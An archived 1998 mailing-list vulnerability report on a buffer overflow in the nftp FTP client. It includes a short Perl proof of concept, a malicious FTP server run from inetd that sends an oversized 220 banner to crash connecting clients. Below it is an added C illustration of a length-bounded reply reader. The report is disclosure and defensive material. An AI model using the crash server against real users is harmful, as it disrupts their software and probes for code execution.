nftp vulnerability (fwd)

From: Eric Wanner (ericwat_private)
Date: Mon Nov 16 1998 - 17:02:43 PST

    nftp is a shareware ftp program available at
    ftp://crydee.sai.msu.su/pub/comp/software/asv/nftp/ that is
    becoming more and more widely used.
    
    Cause: nftp incorrectly handles strings returned by the server.
    
    Tested: tested on version 1.40 linux-libc5 by sending 220 and 4400 X's
    followed by a \n (it didn't work without the \n because it didn't get
    processed).  4400 was a random number; it has nothing to do with the
    exploitability of this program.
    
    Vulnerability: It appears to be an internal buffer that is being
    overfilled, but I do not have the source code, so I cannot tell.  If it is
    an internal buffer, it may be possible to execute arbitrary code on the
    connecting computer, but they have to connect to the server, and they must
    be running this ftp program.
    
    Fix: I do not have the source code so I can't create a patch =).
    
    It seems that too much trust is being put on the servers these days.
    
    I have included a sample crash.  Put it in your inetd if you want to see
    for yourself.
    
    Creator Notified: The creator was notified shortly before sending this
    report.
    
    Fix available: not yet.
    
    --
    
    Eric Wanner
    Head Systems Administrator
    FutureOne, Inc.
    602-385-3379
    http://home.futureone.com
    EfNet: holobyte
    Personal Email: holobyteat_private
    
    Attachment: sample.pl
    
    #!/usr/bin/perl
    use IO::Handle;
    # flush immediately so inetd hands the banner to the client at once
    stdout->autoflush();
    # fake FTP greeting: "220 " followed by 4400 X's and a newline
    print "220 ";
    print "X"x4400;
    print "\n";
    # keep the connection open long enough to watch the client
    sleep 100;
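    For contrast, a client-side reply reader that enforces a length bound instead of trusting whatever the server sends, added here as an illustration; it is not nftp's code and not from the author of the report. REPLY_MAX, the byte_src stand-in for the control socket, and check_banner are assumptions.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical bound for one control-connection reply line: RFC 959 sets
   no maximum, so the client has to pick one and enforce it. */
#define REPLY_MAX 512
typedef enum { REPLY_OK, REPLY_TOO_LONG, REPLY_MALFORMED, REPLY_EOF } reply_status;

/* In-memory byte source standing in for the control socket (assumption). */
typedef struct { const char *data; size_t len, pos; } byte_src;
static int src_getc(byte_src *s) { return s->pos < s->len ? (unsigned char)s->data[s->pos++] : EOF; }

/* Copy one LF-terminated line into out (capacity outsz), never writing past
   outsz-1. An overlong line is drained and reported rather than stored, so
   the caller cannot mistake a truncated line for a valid reply. */
reply_status read_reply_line(byte_src *src, char *out, size_t outsz, int *code) {
    size_t n = 0;
    int c;
    while ((c = src_getc(src)) != EOF && c != '\n') {
        if (c == '\r') continue;
        if (n + 1 >= outsz) {                      /* only the NUL slot is left */
            while ((c = src_getc(src)) != EOF && c != '\n') ;
            out[n] = '\0';
            return REPLY_TOO_LONG;
        }
        out[n++] = (char)c;
    }
    out[n] = '\0';
    if (c == EOF && n == 0) return REPLY_EOF;
    /* RFC 959 reply line: three digits, then ' ' (final) or '-' (continued) */
    if (n < 4 || !isdigit((unsigned char)out[0]) || !isdigit((unsigned char)out[1])
        || !isdigit((unsigned char)out[2]) || (out[3] != ' ' && out[3] != '-'))
        return REPLY_MALFORMED;
    *code = (out[0] - '0') * 100 + (out[1] - '0') * 10 + (out[2] - '0');
    return REPLY_OK;
}

/* Feed a banner shaped like the report's sample: "220 " + n_x X's + "\n". */
reply_status check_banner(size_t n_x, int *code) {
    size_t len = 5 + n_x;
    char line[REPLY_MAX], *banner = malloc(len);
    byte_src src = { banner, len, 0 };
    memcpy(banner, "220 ", 4);
    memset(banner + 4, 'X', n_x);
    banner[len - 1] = '\n';
    reply_status st = read_reply_line(&src, line, sizeof line, code);
    free(banner);
    return st;
}
```

    With the report's 4400-X banner the reader returns REPLY_TOO_LONG and the caller can drop the connection; a normal greeting yields REPLY_OK and code 220.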
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:23:38 PDT